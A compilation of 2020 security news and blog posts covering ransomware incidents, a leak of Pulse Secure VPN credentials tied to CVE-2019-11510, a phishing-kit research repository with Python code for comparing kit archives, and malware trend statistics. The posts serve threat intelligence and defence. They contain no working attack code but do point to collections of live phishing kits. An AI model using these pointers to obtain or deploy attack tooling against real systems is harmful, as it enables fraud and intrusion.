
City of Lafayette (Colorado) paid $45,000 ransom after ransomware attack

The City of Lafayette, Colorado, USA, has been forced to pay $45,000 because they were unable to restore necessary files from backup.

On July 27th, the systems of the City of Lafayette, Colorado, were infected with ransomware; the malicious code impacted phone services, email, and online payment and reservation systems.

The City did not immediately disclose the cause of the outage of its systems and invited the citizens to use 911 or an alternate number for emergency services.

Now the City of Lafayette has admitted it was the victim of a ransomware attack that encrypted its systems, and confirmed that it opted to pay a $45,000 ransom to receive a decryption tool to recover its files.

“After a thorough examination of the situation and cost scenarios, and considering the potential for lengthy inconvenient service outages for residents, we determined that obtaining the decryption tool far outweighed the cost and time to rebuild data and systems,” City of Lafayette Mayor Jamie Harkins explained in a video.

The City did not disclose technical details of the hack or the family of ransomware that infected its systems; it only stated that it does not believe any data was stolen. The City also added that credit card data was not stored on its systems, but it nonetheless invited residents and employees to monitor their bank accounts for suspicious activity.

“Financial data appears to be recoverable from unaffected backups. Personal credit card information was not compromised, as the City uses external PCI-certified payment gateways.” reads the announcement published by the City. “There is no evidence to suggest personal data was compromised, but out of an abundance of caution, residents and employees are advised to be vigilant to monitor accounts for suspicious activity.”

The City is going to notify individuals who have personal information stored on the City’s network.

The small amount of money requested suggests that the attackers are not one of the major ransomware gangs, like Maze, REvil, or Clop, which usually ask for a much higher ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, City of Lafayette)

The post City of Lafayette (Colorado) paid $45,000 ransom after ransomware attack appeared first on Security Affairs.

Avaddon ransomware operators have launched their data leak site

Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where they publish the data of victims who refuse to pay a ransom demand.

Avaddon ransomware operators announced the launch of their data leak site where they will publish the data stolen from the victims who do not pay a ransom demand.

The first group to adopt this strategy was the Maze ransomware gang in December 2019; since then other crews have adopted the same strategy, including REvil, Nefilim, and Netwalker.

The threat of exposing the victim’s sensitive data is used by the gang to force them into paying a ransom.

Cybersecurity intelligence firm Kela was the first to report that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum their new data leak site.

Source BleepingComputer

The hackers have already published on the leak site 3.5MB of documents stolen from a construction company.

Let’s wait for new entries on the leak site!

Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)


Nefilim ransomware operators claim to have hacked the SPIE group

Nefilim ransomware operators allegedly targeted the SPIE group, an independent European leader in multi-technical services.

Researchers from threat intelligence firm Cyble reported that Nefilim ransomware operators allegedly hacked The SPIE Group, an independent European leader in multi-technical services.

The number of ransomware attacks continues to increase; hackers also steal victims’ data and threaten to release the stolen information if the victims do not pay the ransom.

During darkweb and deepweb monitoring, the Cyble Research Team discovered a post from Nefilim ransomware operators in which they claimed to have breached The SPIE Group.

Nefilim ransomware SPIE group

The ransomware gang also revealed to have stolen the company’s sensitive data.

The SPIE Group provides multi-technical services in the areas of energy and communications, it has more than 47,200 employees and in 2019 it reported consolidated revenues of €6.9 billion and consolidated EBITA of €416 million.

Nefilim ransomware operators have also released a first batch of files and threaten to release other documents. Cyble experts analyzed the material; the first lot contains around 11.5 GB of data.

“The data leak seems to consist of corporate operational documents which include the company’s telecom services contracts, dissolution legal documents, power of attorney documents, infrastructure group reconstructions contracts, and much more.” reported Cyble.

The Nefilim ransomware operators released a total of 65,042 files contained in 18,551 data folders.

Nefilim ransomware operators continue to be very active in this period; recently the group targeted the Dussmann Group, Germany’s largest private multi-service provider, and Orange S.A., one of the largest mobile network operators, based in France.

Below is the list of tips provided by Cyble to prevent ransomware attacks:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, SPIE group)


Netwalker ransomware operators claim to have stolen data from Forsee Power

Netwalker ransomware operators breached the networks of Forsee Power, a well-known player in the electromobility market.

A new company has been added to the list of the victims of the Netwalker ransomware operators, it is Forsee Power, which provides advanced lithium-ion battery systems for any mobility application.

The industrial group is based in France and in the USA; it is one of the market leaders in Europe, Asia, and North America with annual revenue of around $65 million and over 200 employees.

Recently Cyble threat research group came across another disclosure from the Netwalker group that announced to have stolen sensitive data from Forsee Power.

Netwalker ransomware operators announced the attack with a message posted on their online blog and shared a few screenshots as proof of the security breach.

One of the images shared by the group shows a directory containing folders such as Accounts Receivable, Finance, collection letters, Expenses, and Employees. 

Below are some tips on how to prevent ransomware attacks provided by Cyble:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Recently the FBI has issued a security alert about Netwalker ransomware attacks targeting U.S. and foreign government organizations.

The feds recommend that victims not pay the ransom and report incidents to their local FBI field offices.

The flash alert also includes indicators of compromise for the Netwalker ransomware along with mitigations.

The FBI warns of a new wave of Netwalker ransomware attacks that began in June, the list of victims includes the UCSF School of Medicine and the Australian logistics giant Toll Group.

The Netwalker ransomware operators have been very active since March and also took advantage of the ongoing COVID-19 outbreak to target organizations.

The threat actors initially leveraged phishing emails delivering a Visual Basic Scripting (VBS) loader, but since April 2020, Netwalker ransomware operators began exploiting vulnerable Virtual Private Network (VPN) appliances, user interface components in web apps, or weak passwords of Remote Desktop Protocol connections to gain access to their victims’ networks.

Recently the Netwalker ransomware operators were looking for new collaborators that can provide them with access to large enterprise networks. 

Below are the recommended mitigations provided by the FBI:

  • Back-up critical data offline.
  • Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
  • Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update anti-virus or anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks.
  • Consider installing and using a VPN.
  • Use two-factor authentication with strong passwords.
  • Keep computers, devices, and applications patched and up-to-date.

Pierluigi Paganini

(SecurityAffairs – Netwalker ransomware, Forsee Power)


Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers

ZDNet reported exclusively that a list of passwords for 900+ enterprise VPN servers has been shared on a Russian-speaking hacker forum.

ZDNet has reported exclusively that a list of plaintext usernames and passwords for 900+ Pulse Secure VPN enterprise servers, along with their IP addresses, has been shared on a Russian-speaking hacker forum.

ZDNet obtained a copy of the list with the help of threat intelligence firm KELA and confirmed the authenticity of the data.

The list includes:

  • IP addresses of Pulse Secure VPN servers
  • Pulse Secure VPN server firmware version
  • SSH keys for each server
  • A list of all local users and their password hashes
  • Admin account details
  • Last VPN logins (including usernames and cleartext passwords)
  • VPN session cookies

According to Bank Security, all the Pulse Secure VPN servers included in the list were vulnerable to the CVE-2019-11510 flaw.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability is easily exploitable using publicly available proof-of-concept code.

In August 2019, researchers from Bad Packets analyzed the number of Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Using the online scanning service BinaryEdge, the researchers found 41,850 Pulse Secure VPN endpoints exposed online, 14,528 of them vulnerable to CVE-2019-11510.

Most of the vulnerable hosts were in the U.S. (5,010), followed by Japan (1,511), the U.K. (830) and Germany (789).

CVE-2019-11510

According to Bad Packets, 677 out of the 913 unique IP addresses found in the list were detected by Bad Packets CTI scans to be vulnerable to CVE-2019-11510 immediately after the exploit was made public in 2019.

The researchers also analyzed the distribution of the vulnerable hosts by industry and discovered that the flaw affects hosts in:

  • U.S. military, federal, state, and local government agencies
  • Public universities and schools
  • Hospitals and health care providers
  • Electric utilities
  • Major financial institutions
  • Numerous Fortune 500 companies

Likely the threat actors who compiled this list scanned the internet for Pulse Secure VPN servers between June 24 and July 8, 2020, and exploited the CVE-2019-11510 vulnerability to gather server details.

Companies on the list have to update their Pulse Secure servers and of course, change their passwords.

ZDNet pointed out that ransomware operators could use the leaked credentials to target large enterprises.

“Making matters worse, the list has been shared on a hacker forum that is frequented by multiple ransomware gangs. For example, the REvil (Sodinokibi), NetWalker, Lockbit, Avaddon, Makop, and Exorcist ransomware gangs have threads on the same forum, and use it to recruit members (developers) and affiliates (customers).” reported ZDNet.

Pierluigi Paganini

(SecurityAffairs – hacking, Pulse VPN)


Introducing PhishingKitTracker

If you are a security researcher, or even just passionate about how attackers implement phishing, you will find yourself looking for phishing kits. A phishing kit is not a phishing builder but a real implementation (actually a re-implementation) of a third-party website built to lure the victim. Initially attackers use a phishing builder to “clone” the original website, but after that they introduce, in the freshly regenerated website, interesting add-ons such as: evasion techniques (to evade phishing detectors), targeted elements (to tailor the page to specific victims), fast redirectors (to follow the attack chain into the original website, or to a relay that tries to infect you) and sometimes exploit kits that try to exploit your browser before letting you go.

Credit: Alen Pavlovic (here)

Motivation

There are places where you can buy phishing kits, for example BleepingComputer wrote a great article on that here, but if you want to get them for free in order to study attack schemas and kit composition you will not find free collections. So I decided to share my PhishingKit Tracker, updated automatically by my backend engine every day, for study and research purposes.

You can find it HERE (PhishingKitTracker github repo)

Disclaimer

This repository holds a collection of Phishing Kits used by criminals to steal user information. Almost every file into the raw folder is malicious so I strongly recommend you to neither open these files, nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

NB: Large File System Ahead

PhishingKitTracker is stored into Git Large File System (git-lfs) due to the big amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data

The raw folder tracks the phishing kits in their original format. No manipulation is involved in that data. A backend script goes over harvested malicious websites (harvesting from common sources) and checks whether phishing kits are in there. In a positive case (if a phishing kit is found) the resulting file is downloaded and instantly added to that folder. This folder is tracked using Git Large File System since many files are bigger than 100MB. The “RAW Data” is quite unexplored land; you would find many interesting topics with high probability. Please remember to cite this work if you find something from here, it would be very appreciated.

STATS

The stats folder maintains two up-to-date files:

  1. files_name holds the frequency of the file names found associated with kits. In other words, every phishing kit is saved on the phishing host with a name; files_name keeps track of every file name and its frequency. If you are wondering why I am not tracking hashes, it is because phishing kits are big compressed archives, so it would make no sense at this stage since they always differ from each other (but check the src folder for additional information).
  2. sites holds the frequency of the hosting domain names, in other words where the phishing kit was found. No duplicates are tracked, meaning that the frequency counts unique file names. So for example if you see something like: 3 li.humanbiomics-project.org it means that three different phishing kits have been found on li.humanbiomics-project.org over time.

Both of these files have been generated by simple bash scripts like:

  • ls raw/ | cut -d'_' -f1 | sort | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | sort | uniq -c | sort -bgr > stats/files_name.txt

(uniq -c only merges adjacent duplicates, so the extracted field is sorted before counting.) These scripts run on every commit, keeping the stats files in line with the raw folder.

On the other side a file called similarity.csv is provided with a tremendous delay due to the vast amount of time in generating it. That file provides the similarity between the tracked Phishing Kits. It’s a simple CSV file so that you can import it on your favorite spreadsheet and make graphs, statistics or manipulate it in the way you prefer.

SIMILARITY.CSV structure

The similarity structure is like the following one: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:

  • FileA is the phishing kit which is considered in that analysis.
  • FileB is the phishing kit to be compared to phishing kit FileA.
  • SimilarityAVG is the average similarity. That average is calculated by computing the similarity check of every single (interesting) file in the phishing kit archive FileA against every single (interesting) file in the phishing kit archive to be compared (FileB).
  • SimilarityMin is the lowest similarity value found between FileA and FileB.
  • SimilarityMax is the highest similarity value found between FileA and FileB.

If you want to generate similarity.csv on your own, I provide a simple and dirty script in the src folder. So far it has several limitations (for example it only handles ZIP files). Please make pull requests to improve and empower it; every contribution would be very helpful.

SRC

Please check those variables (compute_similarity.py) and change them at your will.

EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE = 'similarity.csv'
RAW_FOLDER = '/tmp/raw/'
TEMP_FOLDER = '/tmp/tt'

Once you’ve changed them you can run the script and take a long rest. It will navigate through the RAW_FOLDER, grab the .zip files and try to compute code similarity between them. At the very end it will save the results into OUTPUT_FILE. From there you can import such a file into your favorite spreadsheet processor and elaborate on the code similarity.

So far the Python script is able to compare only zip-tracked phishing kits; support for different compressed formats is still work in progress.

NB: The Python script is in a super early stage of development. Please help to improve it.

How to contribute

Introducing the walking script for different compression formats. In other words, if you want to contribute you can write a new section such as the following one (code_similarity.py) but for different compression extensions such as .tar.gz, .tar, .rar, .7z and so on.

import os
from zipfile import ZipFile

# EXTENSION_FOR_ANALYSIS and TEMP_FOLDER are the configuration variables
# listed in the SRC section above.

# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the entire file
# path of every extracted file for future works
def extractZipAndReturnsIntereistingFiles(file_to_extract):
    interesting_files = []
    try:
        with ZipFile(file_to_extract, 'r') as zipObj:
            for fileName in zipObj.namelist():
                # keep only members whose extension is in the analysis list
                if fileName.endswith(tuple(EXTENSION_FOR_ANALYSIS)):
                    try:
                        # ZipFile.extract() drops absolute paths and ".." components,
                        # so a hostile member name cannot escape TEMP_FOLDER
                        zipObj.extract(fileName, TEMP_FOLDER)
                        interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
                    except Exception:
                        # a single unreadable member must not stop the whole kit
                        continue
    except Exception:
        # corrupted or non-zip archive: return whatever was extracted so far
        return interesting_files
    return interesting_files

One more way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelize the task by forking and spawning more processes, or by changing the way I use multi-threading in this quick and dirty statistics script. In conclusion, every working pull request is welcome.
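As an added example (not the project’s compute_similarity.py, whose comparison method the post does not describe), the following Python reads the “interesting” files straight out of a .zip or .tar.gz kit archive, which is the kind of extension to other compression formats the contribution section asks for, and scores two kits as one FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax row as laid out in the SIMILARITY.CSV section. The line-based difflib ratio, the in-memory reading instead of extraction to a temp folder, and the two constructed placeholder kits are assumptions of this example.

```python
import difflib
import io
import os
import tarfile
import tempfile
import zipfile

# Same extension list as the compute_similarity.py configuration shown above.
EXTENSION_FOR_ANALYSIS = ['.html', '.js', '.vbs', '.xls', '.xlsm', '.doc', '.docm', '.ps1']


def read_interesting_files(archive_path):
    """Return {member_name: bytes} for archive members with an extension of interest.

    Handles .zip and .tar/.tar.gz/.tgz. Members are read into memory instead of
    being extracted, so a hostile member name inside a kit (../ or an absolute
    path) never touches the filesystem. Assumption of this example, not the
    project's approach.
    """
    wanted = tuple(EXTENSION_FOR_ANALYSIS)
    files = {}
    lower = archive_path.lower()
    if lower.endswith('.zip'):
        with zipfile.ZipFile(archive_path, 'r') as zf:
            for name in zf.namelist():
                if name.endswith(wanted):
                    files[name] = zf.read(name)
    elif lower.endswith(('.tar', '.tar.gz', '.tgz')):
        with tarfile.open(archive_path, 'r:*') as tf:
            for member in tf.getmembers():
                if member.isfile() and member.name.endswith(wanted):
                    files[member.name] = tf.extractfile(member).read()
    else:
        raise ValueError('unsupported archive format: ' + archive_path)
    return files


def file_similarity(a, b):
    """Line-based similarity ratio in [0, 1] between two file bodies (difflib)."""
    a_lines = a.decode('utf-8', errors='replace').splitlines()
    b_lines = b.decode('utf-8', errors='replace').splitlines()
    return difflib.SequenceMatcher(None, a_lines, b_lines).ratio()


def kit_similarity(kit_a, kit_b):
    """(SimilarityAVG, SimilarityMin, SimilarityMax): every interesting file of
    kit A compared against every interesting file of kit B."""
    files_a = read_interesting_files(kit_a)
    files_b = read_interesting_files(kit_b)
    scores = [file_similarity(body_a, body_b)
              for body_a in files_a.values() for body_b in files_b.values()]
    if not scores:  # one of the kits has nothing worth comparing
        return (0.0, 0.0, 0.0)
    return (sum(scores) / len(scores), min(scores), max(scores))


def similarity_row(kit_a, kit_b):
    """One similarity.csv line: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax."""
    avg, lo, hi = kit_similarity(kit_a, kit_b)
    return '%s,%s,%.3f,%.3f,%.3f' % (os.path.basename(kit_a), os.path.basename(kit_b), avg, lo, hi)


def build_sample_kits(folder):
    """Write two constructed placeholder kits (one .zip, one .tar.gz) into folder.

    Names follow the raw/ convention of site_filename seen in the stats scripts.
    """
    login = (b'<html><form action="post.php">\n<input name="user">\n'
             b'<input name="pass">\n</form></html>\n')
    script = b'function go(){\n  document.forms[0].submit();\n}\n'
    zip_path = os.path.join(folder, 'example.com_kitA.zip')
    with zipfile.ZipFile(zip_path, 'w') as zf:
        zf.writestr('kitA/index.html', login)
        zf.writestr('kitA/go.js', script)
        zf.writestr('kitA/logo.png', b'\x89PNG...')  # extension not analysed
    tgz_path = os.path.join(folder, 'example.net_kitB.tar.gz')
    with tarfile.open(tgz_path, 'w:gz') as tf:
        for name, data in (('kitB/index.html', login.replace(b'post.php', b'next.php')),
                           ('kitB/go.js', script)):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return zip_path, tgz_path


def demo():
    """Build the two sample kits in a temp dir and score them; returns row and scores."""
    with tempfile.TemporaryDirectory() as tmp:
        kit_a, kit_b = build_sample_kits(tmp)
        return {'row': similarity_row(kit_a, kit_b), 'scores': kit_similarity(kit_a, kit_b)}


if __name__ == '__main__':
    print(demo()['row'])
```

Reading members with zf.read() and tf.extractfile() rather than extracting is deliberate: tarfile’s extractall does not sanitise member paths on older Python releases, and a kit built by an adversary is exactly the input where that matters. In the sample, the two index.html files differ in one of four lines (0.75), the two go.js files are identical (1.0) and the cross pairs share nothing (0.0), so the row reports an average of 0.4375 with minimum 0 and maximum 1.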

Cite the Phishing Kit

@misc{ MR,
       author = "Marco Ramilli",
       title = "Phishing Kits Tracker",
       year = "2020",
       url = "https://marcoramilli.com/2020/07/13/introducing-phishingkittracker/",
       note = "[Online; July 2020]"
     }

Data Breach – Understanding the severity of it

A data breach is a security gap in which information or data is accessed or stolen without authorization. It is a breach of trust between the owner of the data and the party that accesses it without consent. To put it in simpler terms it a nonconsensual usage of someone’s…

Cyber Threats Trends 6 Months Of Findings

After six months from the Cyber Threats Trends launch it is time to check its main findings. When I decided to develop my own Cyber Threats Observatory I was not sure about its effectiveness and I was even more skeptical about its real usage by international cybersecurity communities. Fortunately many students, researchers and professionals used such data to write theses, papers and research. Many of them cited my work (by adding a link in footnotes or in the reference section), others just dropped a “thank you” email. This was enough for me to decide to maintain Cyber Threats Trends for an additional six months. Performing data collection, data analysis and data classification requires a quite expensive back-end, so it needs to be useful for somebody, otherwise it would make no sense to maintain such a dedicated infrastructure.

But now let’s take a look at what it was able to find during the past six months.

Malware Families

The most seen malware families from January 2020 to June 2020 (6 months of activity) are the following ones:

  • GandCrab ~3%
  • Upatre ~1.9% (!!)
  • Emotet ~1.8%
  • TrickBot ~1.25%

This looks to be in line with many available statistics and reports from 2020, with the only exception of Upatre, which looks super out of place in 2020; but I have mostly discussed it here, so today I am quite confident it is not a wrong classification. Many other families have been seen according to the following graph, but they will not be discussed in the current post.

Malware Families

Looking at the distribution of the top malware families we might focus on figuring out whether some temporal pattern emerges. The following image shows the GandCrab family distribution over time. It is interesting to see that GandCrab was mostly active during the last two weeks of March, reaching its top detection rate on 2020-03-31 with about 138 unique “findings” in that single day. On the contrary, it looks to be less used during May and June 2020.

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

From Malpedia

Pattern-wise, we might agree there is a kind of frequency inside it. If you group the dates by week you might find that GandCrab is mostly used twice per month. If you consider a “top” (the biggest local maximum of the detection rate) as the campaign launch day and the following, smaller local maxima in detection rate as physiological campaign adjustments, it looks like attackers take two weeks to harvest profit from the previously launched campaign and to prepare new artifacts for the following one.

GandCrab Distribution over time

The following graph shows the Upatre family distribution over the past six months.

First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From Paloalto Unit42

This is a very interesting graph because Upatre had not been used for years (I bet since 2016). However it looks like attackers recovered it and restarted using it from April 2020. Grouping by date you would notice a 3-day rhythm, meaning that from one “attack wave” to another it takes an average of 3 days. I will perform additional checks on that, but static rules perfectly match what we are seeing in the Upatre graph.

Upatre Distribution over time

Moving on to TrickBot, the following image shows its distribution over time. TrickBot was mostly active during the first months of 2020 in a constant and linear way, while from March to April 2020 it experienced a quite significant speedup. Due to COVID-themed campaigns, Cyber Threats Trends recorded more TrickBot than ever before in such a time frame.

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

From Malpedia
TrickBot Distribution over time

The following image shows the Emotet distribution over time. As expected, Emotet’s distribution follows the TrickBot one. Even if the relationship between the TrickBot folks and the Emotet folks is not clear, we are quite accustomed to seeing these frameworks delivered closely together in common campaigns, like for example a few months ago when we experienced a lot of Ryuk (ransomware) distribution using Emotet + TrickBot.

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.

From Malpedia
Emotet Distribution

Some indicators, such as the detection rates in January and in June, show us that Emotet is used in these specific months even without TrickBot, which might suggest a different attack delivery procedure and highlight a different threat actor. In other words, comparing TrickBot and Emotet we observe that there are mainly two groups: a group which delivers TrickBot and Emotet together (such as the Ryuk ransom group) and a group which uses Emotet without TrickBot.

Carrier Distribution

Excluding the exe file type, which is the most analyzed file extension in the dropper panorama, we continue to observe many Office files as the main malware carrier. For example, Microsoft Word documents with macros are the most observed malware carrier, followed by PDF documents and CDF contents. While PowerShell files are still one of the most emerging threats, we have not observed a vast amount of malware delivery on such a carrier so far, but we see a revamping of the ancient Microsoft Excel Macro 4.0 as an obfuscation technique.

Frequency no EXE

It is still quite interesting how those statistics change over time. Indeed PDF and OLE objects are still the most used during the analyzed period of time. Even CDF documents are quite common, while simple scripts such as VBScript or JavaScript are slowly decreasing their presence in international statistics.

Conclusion

Developing Cyber Threats Trends has been a great journey! I had many sleepless nights and additional costs due to a quite big backend network (especially “database speaking”), but I had the opportunity to collect super interesting data and to increase my knowledge on malware statistics and on developing distributed systems. Moreover, it turned out to be a quite useful data collection and trend analysis tool for quite a few people out there! I will definitely keep it collecting more data!

Is upatre downloader coming back ?

Hi folks, today I want to share a quantitative analysis on a weird return match by Upatre. According to Unit42, Upatre is an ancient downloader first spotted in 2013, used to inoculate banking trojans and active up to 2016.

First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From PaloAlto Unit42

From 2016 until today I have never experienced a new Upatre campaign, or anything like that, but something seems to have changed. Analyzing the Cyber Threats Trends findings (for an upcoming post) I spotted an interesting revival of the Upatre downloader starting from April 2020. The following image shows what I mean: zero Upatre findings until April 21 2020 and almost 50 single detections per day since that date. Those statistics are so strange to me that I had to doubt them. So let’s take a closer look and see if there is some misclassification around.

Upatre Time Distribution

Digging a little bit into those samples by asking a second opinion from VirusTotal, it looks like the matches are genuine. In order to verify that “revival”, I first took some random samples (with the Upatre classification tag) and then verified on VirusTotal the malware classification and the first submission date. Following is an example of the checks performed. As you might see from the following picture, 9 AVs classified that sample as Upatre, so we might consider it neither a “false positive” nor a misclassified sample.

Upatre Correct Classification

The following image shows the “First Submission Date” which is aligned to what I’ve seen on Cyber Threats Trends. If you take some more samples from the following list (IoC Section) you will probably see much more cases similar to that one. I did many checks and I wasn’t able to find mismatches at all, so I decided to write up this post about it.

Upatre First Submission

Conclusion

It is something very interesting, at least to my understanding, to see an ancient downloader resumed in such a specific period. Many people, starting from April up to today, are stuck at home performing what has been called “quarantine” due to the COVID pandemic. Curiously, during the same time, while people are working from home and potentially have much more free time (since they cannot leave home), this older downloader reappears. Maybe somebody took advantage of this bad situation to resurrect some old tools stored on a dusty external hard drive?

IoC (3384)

For the complete IoC list check it out: HERE

Poulight- An info-stealing trojan might be teaching you how to play Minecraft

Poulight is an info-stealer trojan which most probably originated in Russia. It is written in the .NET and can collect sensitive information and deliver it to cybercriminals. Ever since its first appearance, it has been growing substantially and taking different forms. The main Infection vector remains spear-phishing emails. It was…

Cybersecurity Trends

Trends are interesting since they can tell you where things are going.

I believe in studying history and behaviours in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying what we observed during the past months and writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year for the cyber security of the European productive sector. What made the year peculiar was not strictly the number of hacking attempts, or the amount of malware code spread across the Internet to compromise company assets and data, but the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019 we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each with its own attributes in terms of motivations, objectives, methods and sophistication.

During 2019 we observed a rapid evolution of the cyber crime ecosystems hosting a wide range of financially motivated actors, and an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO fraud, credential-stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but they are traditionally much more active in so-called “opportunistic” cyber attacks: attacks directed at the whole internet population, such as botnet and crypto-miner infection waves, but also regional operations designed, for instance, to target European countries like Italy or Germany as branches of major global-scale campaigns, as we have tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.
In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast growth of the ransomware phenomenon, both in terms of newborn ransomware families and of ransom payment options, driven by the consolidation of the cryptocurrency market, which made the traditional tracking techniques operated by law enforcement agencies less effective due to new untraceable cryptocurrencies. But these increasing volumes were not the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive-by download attacks and exploit kits, but also, very frequently, through the email vector. In fact, the “canonical” ransomware attack before 2019 was an incoming email luring the victim into opening an attachment, most of the time an Office document, carefully obfuscated to avoid detection and weaponized to launch ransomware able to autonomously encrypt local user files and shared documents.

During 2019 we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators moved into this emerging sector, leveraging their infection capabilities, their long-term hacking experience and their bots to monetize their actions through new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in delivering follow-up ransomware to infected hosts. A typical example is the GandCrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups went further and set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” unit; let's call them “DarkTeams”. These units manually engage high-value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network right after ensuring the deletion of the backup copies. Many times they also use industry-specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operation have been used for a long time, but not by such a large number of actors and not with such objectives. Network penetration was in fact a peculiarity of state-sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referred to as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019 we observed a strong game change in the ransomware attack panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks, carrying them into private business sectors that were not traditionally prepared to deal with such threats. Then they started to hit organizations with high-impact business attacks modeled to be very effective in the victim's context. We are facing the evolution of ransomware into Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attack model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operations of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they were only the tip of the iceberg. Many other criminal groups have consolidated this kind of operation, such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies it hacked into, along with pieces of internal data stolen during the network intrusions.

The problem grows when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization in an additional, unfortunate position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these practices to become more and more common in the criminal ecosystems. Thus, adopting a proactive approach to the cyber security strategy, leveraging services like Yoroi's Cyber Security Defence Center, could be crucial to equip the company with the proper technology to gain visibility on targeted ransomware attacks, and the knowledge, skills and processes to spot and handle this new class of threats.

Zero-Day Malware

Well-known threats are always easier to recognize and manage since their components and intents are very often clear. For example a ransomware, as known today, performs some standard operations such as (but not limited to): reading a file, encrypting it and writing it back. Early discovery of a known threat family helps analysts perform quick and precise analyses, while unknown threats are always difficult to manage, since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi's technology captures and collects samples before processing them on Yoroi's shared threat intelligence platform, trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi's technology reports whether the malicious files are potentially detected by anti-virus technologies at detection time. This check is mainly done to figure out whether the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words, we are able to see whether malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, firewalls, Next Generation X and the endpoints in use.
